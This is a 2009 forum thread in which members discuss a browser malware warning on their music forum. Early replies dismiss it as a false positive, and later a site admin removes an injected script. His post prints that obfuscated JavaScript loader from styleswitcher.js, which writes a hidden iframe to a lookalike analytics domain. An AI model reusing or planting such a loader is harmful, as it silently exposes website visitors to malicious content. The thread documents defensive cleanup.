Virus/Trojan Warning

Discussion of all things not related to Indian music with a special focus on the forum's features, bugs, and performance.

Moderators: povster, s1owpoke, cabernethy, coughcapkittykat

mahadev

Virus/Trojan Warning

Post by mahadev » Thu Jul 30, 2009 12:36 am

I get a warning when accessing this forum,HTML something or other.

Is this a false positive ?
http://maxflury.com/

cwroyds

Re: Virus/Trojan Warning

Post by cwroyds » Thu Jul 30, 2009 2:31 am

Hey Max,

David has investigated this thoroughly and found that there is no virus or damaging thing. (You can see the threads in the "These forums" section.)
This happens to sites now with Googles overly sensitive overview.
My brothers site get this too and there is nothing wrong.
In fact when the warning comes up on my brothers site and you click the link to get more information about the problem the google page it takes you too says there is nothing wrong.
I cant get them to rescan an verify the site.
It is very confusing.

But there is nothing to fear in accessing the forum.

Aanaddha

Post by Aanaddha » Thu Jul 30, 2009 3:41 am

Wierd. I get the virus pop-up with Windows 7 but not with Vista. Same av software/same browser.
If he could sing, and nature to accompany him, what need would he have for an instrument?

mahadev

Post by mahadev » Thu Jul 30, 2009 10:43 pm

Thanks Aanaddha,

I thought so, it is annoying however, like everything about Windows. Time to get another Mac.

Best regards.
http://maxflury.com/

cwroyds

Post by cwroyds » Fri Jul 31, 2009 12:04 am

Max, I thought you were already a MAC guy.
MACs are great, and they keep getting better and better.
Expensive, but great.

Lars

Post by Lars » Tue Aug 04, 2009 4:29 am

Took me a long time to figure this out but....You get what you pay for, at least with Macs....pure joy still to use them, not a single problem!
http://www.raincitymusic.com

Aanaddha

Post by Aanaddha » Tue Aug 04, 2009 5:12 pm

It's not a Mac vs. Windows problem. It's that certain web-protection software (Norton/McAfee/Avast) don't like ads that appear on .php pages (particularly those supported with Google Analytics). The same may occur if you're running the same web-protection with Mac or Windows.
Bottom line: you can purchase two PC's for the price of one Mac. For some the difference in cost outweighs any subtle advantages. At least PC's will allow you run various versions of Windows OS without having to purchase a new machine each time. (99 of 100 problems with PC's are due to the manufacturer, with peripherals, or with problematic individual software programs not with the OS, same as with Mac.)

btw - Google is soon to unveil it's own unique web-based OS (free, and requiring only a bare minimum of resident software to compromise the hard-drive.)
If he could sing, and nature to accompany him, what need would he have for an instrument?

cwroyds

Post by cwroyds » Tue Aug 04, 2009 8:02 pm

The website malware warnings are certainly not platform specific.
It is just browser/google protection stuff.

I will say that I work on both Mac and PC and the Mac OS is FAR superior to windows in every way.
It is not subtle differences.
The whole experience cannot be compared.
OS X just plain kills windows.
I do understand why some stay with windows as if you had windows since the beginning then your software is all PC format.
My windows experience has always been a nightmare of viruses, malware, crashes, and a badly thought out OS architecture.
Honestly, if you have had significant experience with both Operating systems there is no way you would champion Windows over OS X.

If the argument goes only to price then OK the PC wins.
But for me I am there for the ease of use, total overall experience, lack of hassle, etc.
Mac wins.

Aanaddha

Post by Aanaddha » Tue Aug 04, 2009 10:28 pm

I don't have a problem with Macs, only with the price; and I've not experienced the nightmare problems with Windows that others claim to have had. I also learned a long time ago not to have anything whatsoever to do with Norton or with Yahoo. Rip-off Sony software and Adobe products are also on my list of pet peeves.
I can't do without my iPod but I could do very well without the iTunes barrage of ads, updates and unavoidable links to Apple products.

david
Site Admin

Post by david » Fri Nov 27, 2009 4:34 pm

I have just commented out the line:

Code: Select all

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('f 4=6 5(),2=6 5(4.d()+g);c(0.7.9("8=1")==-1){0.b("<3 a=1 e=1 o=\'n://h-q.m/l/\' i=\'j:k\'></3>");0.7="8=1;"+" 2="+2.p()+"; "}',27,27,'document||expires|iframe|today|Date|new|cookie|ubit|indexOf|width|write|if|getTime|height|var|2678400000|google|style|display|none|b2b|com|http|src|toGMTString|analyticks'.split('|'),0,{}))
in the file:
styles/prosilver/template/styleswitcher.js

If anyone has any comments to make concerning this deletion, kindly let me know.

Peace

David Courtney

david
Site Admin

Post by david » Wed Dec 02, 2009 3:44 pm

It has been several day's, and there has been no indication that there has been any loss of functionality to the boards. Therefore instead of simply commenting out the line, I have gone on and deleted it.

as usual, any comments or observations are welcome.

Peace

David Courtney

povster
Site Admin

Post by povster » Wed Dec 02, 2009 6:16 pm

Thanks David. I see no loss of funtionality here. It would be interesting to see if the folks using the av software (I think it may have been Avast?) that were getting the warning still do.
...Michael
Dasani - the official bottled water of ICM
Panini - the official bread of ICM

cwroyds

Post by cwroyds » Wed Dec 02, 2009 9:24 pm

One thing I see that is different is the "Active Topics" section.
It used to have a list of all the active topics, but now only has one.
Maybe it at got reset and will eventually fill up, but there are topics that are active that are not showing up in there.